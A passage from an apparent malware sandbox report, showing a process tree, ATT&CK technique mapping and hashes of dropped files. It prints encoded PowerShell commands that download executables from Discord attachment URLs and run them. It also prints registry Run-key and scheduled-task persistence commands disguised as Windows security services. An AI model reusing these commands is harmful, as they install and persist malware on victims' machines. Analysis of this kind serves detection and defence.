JwApADwAIwB4AHcAcwAjAD4A"
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2868
                                                              • C:\Users\Admin\AppData\Roaming\ab53d2342.exe
                                                                "C:\Users\Admin\AppData\Roaming\ab53d2342.exe"
                                                                5⤵
                                                                  PID:4696
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                    6⤵
                                                                      PID:4632
                                                              • C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOST.EXE
                                                                "C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOST.EXE"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:784
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAMQA5ADkANwAwADkAOAAwADIANgAwADgALwBDAFIALgBlAHgAZQAnACwAIAA8ACMAawBnAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AHIAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAG0AZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAGIAOABmADIALgBlAHgAZQAnACkAKQA8ACMAZABwAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgBnAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZgBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA4AGYAMgAuAGUAeABlACcAKQA8ACMAZQBrAGgAIwA+AA=="
                                                                  4⤵
                                                                    PID:3560
                                                                    • C:\Users\Admin\AppData\Roaming\ab8f2.exe
                                                                      "C:\Users\Admin\AppData\Roaming\ab8f2.exe"
                                                                      5⤵
                                                                        PID:4200
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
                                                                          6⤵
                                                                            PID:2284
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                                                            6⤵
                                                                              PID:4416
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                                                                7⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:5032
                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              #cmd
                                                                              6⤵
                                                                                PID:2184
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                #cmd
                                                                                6⤵
                                                                                  PID:4896
                                                                          • C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREE.EXE
                                                                            "C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREE.EXE"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1200
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAOQA2ADkAMAAxADYANAA3ADEANgA0ADMALwBXAGkAbgBkAG8AdwBzAFMAZQBpAHMAcwBvAG4ATQBhAG4AYQBnAGUAcgAuAGUAeABlACcALAAgADwAIwBoAGwAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZwB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAdQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADMAZABmAHMAMQBmADIALgBlAHgAZQAnACkAKQA8ACMAbgB2AGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaABqAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHkAeQBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADMAZABmAHMAMQBmADIALgBlAHgAZQAnACkAPAAjAGMAegBxACMAPgA="
                                                                              4⤵
                                                                                PID:4788
                                                                                • C:\Users\Admin\AppData\Roaming\ab53dfs1f2.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\ab53dfs1f2.exe"
                                                                                  5⤵
                                                                                    PID:4664
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '' -Value '"C:\Users\Admin\AppData\Roaming\WindowsSeissonManager\WindowsSeissonManager.exe"' -PropertyType 'String'
                                                                                      6⤵
                                                                                        PID:3928
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        #cmd
                                                                                        6⤵
                                                                                          PID:5076
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                          #cmd
                                                                                          6⤵
                                                                                            PID:4716
                                                                                    • C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREEN.EXE
                                                                                      "C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREEN.EXE"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2236
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAMwA0ADEANgA0ADUAMAA1ADQAMAA1ADIALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcALAAgADwAIwBtAGEAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AdABoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAegBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADgAMQBmADIALgBlAHgAZQAnACkAKQA8ACMAbABjAGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbQB6AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAdQB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADgAMQBmADIALgBlAHgAZQAnACkAPAAjAHEAbAB5ACMAPgA="
                                                                                        4⤵
                                                                                          PID:4232
                                                                                          • C:\Users\Admin\AppData\Roaming\ab281f2.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\ab281f2.exe"
                                                                                            5⤵
                                                                                              PID:4632
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
                                                                                                6⤵
                                                                                                  PID:376
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                                                                                  6⤵
                                                                                                    PID:160
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                                                                                      7⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:3792
                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                    #cmd
                                                                                                    6⤵
                                                                                                      PID:3352
                                                                                          • C:\Users\Admin\AppData\Roaming\ab82.exe
                                                                                            C:\Users\Admin\AppData\Roaming\ab82.exe
                                                                                            1⤵
                                                                                              PID:4296
                                                                                            • C:\Users\Admin\AppData\Roaming\ab53d2342.exe
                                                                                              C:\Users\Admin\AppData\Roaming\ab53d2342.exe
                                                                                              1⤵
                                                                                                PID:1672
                                                                                              • C:\Users\Admin\AppData\Roaming\ab521f2.exe
                                                                                                C:\Users\Admin\AppData\Roaming\ab521f2.exe
                                                                                                1⤵
                                                                                                  PID:4900

                                                                                                Network

                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                Execution

                                                                                                Scheduled Task

                                                                                                1
                                                                                                T1053

                                                                                                Persistence

                                                                                                Scheduled Task

                                                                                                1
                                                                                                T1053

                                                                                                Privilege Escalation

                                                                                                Scheduled Task

                                                                                                1
                                                                                                T1053

                                                                                                Discovery

                                                                                                System Information Discovery

                                                                                                1
                                                                                                T1082

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                  Filesize

                                                                                                  3KB

                                                                                                  MD5

                                                                                                  010c219c46b4439bc787644989e20389

                                                                                                  SHA1

                                                                                                  f3a63066ab4446458bd6417386777e39e09b9b25

                                                                                                  SHA256

                                                                                                  2a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa

                                                                                                  SHA512

                                                                                                  c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  4a30a8132195c1aa1a62b78676b178d9

                                                                                                  SHA1

                                                                                                  506e6d99a2ba08c9d3553af30daaaa0fc46ae4be

                                                                                                  SHA256

                                                                                                  71636c227625058652c089035480b7bb3e5795f3998bc9823c401029fc844a20

                                                                                                  SHA512

                                                                                                  3272b5129525c2b8f7efb99f5a2115cf2572480ff6938ca80e63f02c52588216f861307b9ef962ba015787cae0d5a95e74ebb5fe4b35b34f1c4f3a7deac8ce09

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                  Filesize

                                                                                                  44KB

                                                                                                  MD5

                                                                                                  7247129cd0644457905b7d6bf17fd078

                                                                                                  SHA1

                                                                                                  dbf9139b5a1b72141f170d2eae911bbbe7e128c8

                                                                                                  SHA256

                                                                                                  dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

                                                                                                  SHA512

                                                                                                  9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                  Filesize

                                                                                                  45KB

                                                                                                  MD5

                                                                                                  0b5d94d20be9eecbaed3dddd04143f07

                                                                                                  SHA1

                                                                                                  c677d0355f4cc7301075a554adc889bce502e15a

                                                                                                  SHA256

                                                                                                  3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

                                                                                                  SHA512

                                                                                                  395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  ff8cd1e66fa8d16f12cc5226141d310b

                                                                                                  SHA1

                                                                                                  71fb0855b32de0b888e30fbf1b9d83c9793d62ef

                                                                                                  SHA256

                                                                                                  6e393e09f92368b1e5e106096e15a74a7e08c099853b3f9845a93c3cee60465f

                                                                                                  SHA512

                                                                                                  c985adcb680f668969884c0169258da366df70c39969a20616e2ca2fbe99cac1cbe456f79ec73b03fb4f5d551ef0fbac8dab8706cab5fd28bf59c8acea3bdb7a

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  c7a0207c6e0f10c8cb902dc4c1e868f8

                                                                                                  SHA1

                                                                                                  e9f1117e057170782b4061f478df35e5917c5fc6

                                                                                                  SHA256

                                                                                                  8292ff7255aed716e140f7c7c4aeb0cd59f332bee8956b720b90f4d8901f0ef8

                                                                                                  SHA512

                                                                                                  e8b0811c313ee66bae825293b0dfb7ffc2a9407cc80b0ae13de03a79793093db87266c77eb3557f95058644b23e1665a2b93f39258a4a6a21a844d22ebeea7c7

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  83fdc0abf204706eba1ece5910acd1b2

                                                                                                  SHA1

                                                                                                  5766071f0b81d43799ed962273ec150a5c5bce38

                                                                                                  SHA256

                                                                                                  f8a15ef6316ba812f8da1305aca48264f4ec75a042c0a8867c40ef2a1e99eb55

                                                                                                  SHA512

                                                                                                  8c76f1ebfdb8bd0081695a3cefad4c14576dc3010853f1d8b7de1faf51957dc0e2b143fbf8ed462b447fd92490e4cb9336d4073cbb5bef87fee9ab432927ef3f

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  b23708168d975bc6c698e2196b0292ff

                                                                                                  SHA1

                                                                                                  1369784b8db83745a4366b8d48da020b60b88bfd

                                                                                                  SHA256

                                                                                                  a415d4fee6eeeda0d21ba0f59ff72e98c01415d11c62ed15f9c826d2f44e5508

                                                                                                  SHA512

                                                                                                  7827f7303792f6403e6b8f9c30f7a60eed264189d6235cfc4ffcb76b998a778754b9dbefd9be1a7491e52cd64abd5c254ced0cecb4d4624e37f931265d0d4b3b

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  503524ea406371cce29b284be1760355

                                                                                                  SHA1

                                                                                                  65383bcdcc628e5e8050ef13bca37e1493bed3b9

                                                                                                  SHA256

                                                                                                  ac9d141688a9413861bbc6075e68c6ef8cbda5b2e61adde9861819c5817bb6a2

                                                                                                  SHA512

                                                                                                  46cef46fc65e2190dc474fc8e09d96aafd3f47fba4b419e4bc450016ba327447f36e699e30246ba6d79e1e51afed719d974f6b85aaef0b9ba8e2b19787cff9c2

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  ed0b186e45966ac29f281a135d3bbf8e

                                                                                                  SHA1

                                                                                                  dcab91b2f1bcf6874de5b1210086ab849c0a6ce4

                                                                                                  SHA256

                                                                                                  35cf391a8f0a427338bdda8f4024363b2d523c0e8a44a8e748408a138a6a5b97

                                                                                                  SHA512

                                                                                                  9c26171d81b99f6487ef4703d011194822b29670a867b18c3299175d7d5b441501950789c529114630addee0f8837fd3001f5e074a0b222d4f4b788d0764662e

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  ed0b186e45966ac29f281a135d3bbf8e

                                                                                                  SHA1

                                                                                                  dcab91b2f1bcf6874de5b1210086ab849c0a6ce4

                                                                                                  SHA256

                                                                                                  35cf391a8f0a427338bdda8f4024363b2d523c0e8a44a8e748408a138a6a5b97

                                                                                                  SHA512

                                                                                                  9c26171d81b99f6487ef4703d011194822b29670a867b18c3299175d7d5b441501950789c529114630addee0f8837fd3001f5e074a0b222d4f4b788d0764662e

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  ad29805293430681c69e6dd5fccdcd66

                                                                                                  SHA1

                                                                                                  51bcfda57a40ee7bb1d79401fb6c4161dacd6213

                                                                                                  SHA256

                                                                                                  453f92117bef97fc597ac06217cdd53c80598077ecb2b88233e3f51b101249d8

                                                                                                  SHA512

                                                                                                  851e7e332de4f2097e77769a43740d02f3fe43a491fb7241b300b1875f276b6324637f0a343c31f51cc1910dc87dc71858f7bec7e36e84e1c53afa40a0461322

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  2999f5dea98fde7888457afd5bbfd8c9

                                                                                                  SHA1

                                                                                                  ed94ee4340a39960f9e2e582cbe9f930ef36f1aa

                                                                                                  SHA256

                                                                                                  3ccf0fd069386fb799a636197c13ba14a316d9ca044e93bcad53ba8c6f226410

                                                                                                  SHA512

                                                                                                  64fd74a0919a6c3e77449bc1e8b82ac0c03e33a5f9b661079f6bc3b3fa0913555670575e322992d87cc2a3f9f5416ecd26ee47bebb26a16a322597d7896cc73f

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  d07aa4ee05b0dad60435efd846058e42

                                                                                                  SHA1

                                                                                                  8704b125b26de8c4b7926a7afc6a1787ad843ac6

                                                                                                  SHA256

                                                                                                  e6c914fb7f6f20c17fd8a38e48967065bd3caee9733322435765070af6f68181

                                                                                                  SHA512

                                                                                                  198d0e0c6ec8c3d2829cc49787efc5bc2744bb211f00ca8c92745532d9cd8576f040df7e9ff42d786e181625a5b55bad778857990744a24b6a0fac5f62e1756a

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  d07aa4ee05b0dad60435efd846058e42

                                                                                                  SHA1

                                                                                                  8704b125b26de8c4b7926a7afc6a1787ad843ac6

                                                                                                  SHA256

                                                                                                  e6c914fb7f6f20c17fd8a38e48967065bd3caee9733322435765070af6f68181

                                                                                                  SHA512

                                                                                                  198d0e0c6ec8c3d2829cc49787efc5bc2744bb211f00ca8c92745532d9cd8576f040df7e9ff42d786e181625a5b55bad778857990744a24b6a0fac5f62e1756a

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  6eba23a058e7d06fb424d7abc21c7b0b

                                                                                                  SHA1

                                                                                                  af92ae47f85e183fee600c8c63428e1656dd0a88

                                                                                                  SHA256

                                                                                                  4417b65d9a8b888b1a08e4ea7f3d7971858633b8395378f924f4d74dcbe737e5

                                                                                                  SHA512

                                                                                                  b038c52c3cf39870f4c53d6870c34275eead64162135d5798744cbcf0cc11acdfeb0a65ece0c84c217bdbbddde0291c6873ee5648da7a2abee6a17b07ee77993

                                                                                                • C:\Users\Admin\AppData\Roaming\342fd2.exe
                                                                                                  Filesize

                                                                                                  118KB

                                                                                                  MD5

                                                                                                  1dd30155ec8ee09f000bdcaffb0a1f72

                                                                                                  SHA1

                                                                                                  a95532b6f8e144d7b13103e87c3adf2e5decd026

                                                                                                  SHA256

                                                                                                  4684102c79db444eddda04dcdfb7d4f3d4c334171c4ca6d86dc381337e88f529

                                                                                                  SHA512

                                                                                                  39d02169ff475f8520198e57ffbad493862f19196223233df0f48e257381bcfa4ec04263b6eac9a00a0a590f50269497bd241dbed1a0e48346ec210662272ffa

                                                                                                • C:\Users\Admin\AppData\Roaming\342fd2.exe
                                                                                                  Filesize

                                                                                                  118KB

                                                                                                  MD5

                                                                                                  1dd30155ec8ee09f000bdcaffb0a1f72

                                                                                                  SHA1

                                                                                                  a95532b6f8e144d7b13103e87c3adf2e5decd026

                                                                                                  SHA256

                                                                                                  4684102c79db444eddda04dcdfb7d4f3d4c334171c4ca6d86dc381337e88f529

                                                                                                  SHA512

                                                                                                  39d02169ff475f8520198e57ffbad493862f19196223233df0f48e257381bcfa4ec04263b6eac9a00a0a590f50269497bd241dbed1a0e48346ec210662272ffa

                                                                                                • C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVIC.EXE
                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  44371894fdc56374dbafc56bfe33da64

                                                                                                  SHA1

                                                                                                  30963a46c31598affed6a024a98c516a278893df

                                                                                                  SHA256

                                                                                                  b306de22d1dea8572d29bba8a3782beb7dd18f682c397d66f9363bbb439be58b

                                                                                                  SHA512

                                                                                                  22091d8f46929576138b6e2201c8b119b3688f4e4f0619de0b62974073c2f2c55ea9b7188b1d0f936898ff85e660c500d674c5a86a0a81129cb489630bc5720a

                                                                                                • C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVIC.EXE
                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  44371894fdc56374dbafc56bfe33da64

                                                                                                  SHA1

                                                                                                  30963a46c31598affed6a024a98c516a278893df

                                                                                                  SHA256

                                                                                                  b306de22d1dea8572d29bba8a3782beb7dd18f682c397d66f9363bbb439be58b

                                                                                                  SHA512

                                                                                                  22091d8f46929576138b6e2201c8b119b3688f4e4f0619de0b62974073c2f2c55ea9b7188b1d0f936898ff85e660c500d674c5a86a0a81129cb489630bc5720a

                                                                                                • C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  d7b61ed02a876336d7f0ef3f2fae3827

                                                                                                  SHA1

                                                                                                  9aaf625ec1e7d7aa29a7d90ce4cafdfc35723fac

                                                                                                  SHA256

                                                                                                  2e618a6cf8584a8a3aea443c98360a32c4eb678a8a457df58ae7f8a66ebe23ee

                                                                                                  SHA512

                                                                                                  817b046a97eb5435d64a67487250bd21e97b0b60af5c3fced1f2b05e3f88967deddfe829e21f349a730e90cb40d3c1f780e7e961760d27c8a79fa2412a2ab576

                                                                                                • C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  d7b61ed02a876336d7f0ef3f2fae3827

                                                                                                  SHA1

                                                                                                  9aaf625ec1e7d7aa29a7d90ce4cafdfc35723fac

                                                                                                  SHA256

                                                                                                  2e618a6cf8584a8a3aea443c98360a32c4eb678a8a457df58ae7f8a66ebe23ee

                                                                                                  SHA512

                                                                                                  817b046a97eb5435d64a67487250bd21e97b0b60af5c3fced1f2b05e3f88967deddfe829e21f349a730e90cb40d3c1f780e7e961760d27c8a79fa2412a2ab576

                                                                                                • C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTS.EXE
                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  f49573914996430baaf9492f77c769f1

                                                                                                  SHA1

                                                                                                  53b49234fd5f96752ad034cff5fbb84759c2ab63

                                                                                                  SHA256

                                                                                                  513dc9cbe385deda6dceea00c5b75451c1b97147b152e00c0274942df1c89e46

                                                                                                  SHA512

                                                                                                  533d3a753db6148d81d5eacd124378c5c5affedda6ac2f8f94fedf85f6366a73f1aa2f6c49fe431d884be0751e46fcae05d2b609e7009e3fa0dd7d1f703d539e

                                                                                                • C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTS.EXE
                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  f49573914996430baaf9492f77c769f1

                                                                                                  SHA1

                                                                                                  53b49234fd5f96752ad034cff5fbb84759c2ab63

                                                                                                  SHA256

                                                                                                  513dc9cbe385deda6dceea00c5b75451c1b97147b152e00c0274942df1c89e46

                                                                                                  SHA512

                                                                                                  533d3a753db6148d81d5eacd124378c5c5affedda6ac2f8f94fedf85f6366a73f1aa2f6c49fe431d884be0751e46fcae05d2b609e7009e3fa0dd7d1f703d539e

                                                                                                • C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTSC.EXE
                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  11e8bdae2882da20c4989038db8e7794

                                                                                                  SHA1

                                                                                                  cfcced0596c50e03813e52020712e4dcfc8b596b

                                                                                                  SHA256

                                                                                                  b7e16ad0b69e6ec7c447f28833914013fd73c23286431e1a30eab72bf9c45a17

                                                                                                  SHA512

                                                                                                  6fca2bf218ec361a071b03bc7abf2a0eace0a2b43c691b6dab5615103053e23f9dd76628d6e319f88b5d7052df484aebbfbc6f258032a59f46d3654d372d5963

                                                                                                • C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTSC.EXE
                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  11e8bdae2882da20c4989038db8e7794

                                                                                                  SHA1

                                                                                                  cfcced0596c50e03813e52020712e4dcfc8b596b

                                                                                                  SHA256

                                                                                                  b7e16ad0b69e6ec7c447f28833914013fd73c23286431e1a30eab72bf9c45a17

                                                                                                  SHA512

                                                                                                  6fca2bf218ec361a071b03bc7abf2a0eace0a2b43c691b6dab5615103053e23f9dd76628d6e319f88b5d7052df484aebbfbc6f258032a59f46d3654d372d5963

                                                                                                • C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOO.EXE
                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  674a6b0440cecab1ec79ad84fe1b4399

                                                                                                  SHA1

                                                                                                  81cace3e263aadb537d2d63d348922cdc08a6c3f

                                                                                                  SHA256

                                                                                                  0e130d7ef88803500f5d7ff5d21f93f07c33ed27286ead775dd1dc7185a0c3ad

                                                                                                  SHA512

                                                                                                  104c4078195c9803bfba2633d9370e607f2e93d5d51e72c6bc4258478e62b0ab8d79d2d751828188b259faebd24792b85f68d76b3b7bcee98b3ec8894c58d823

                                                                                                • C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOO.EXE
                                                                                                  Filesize

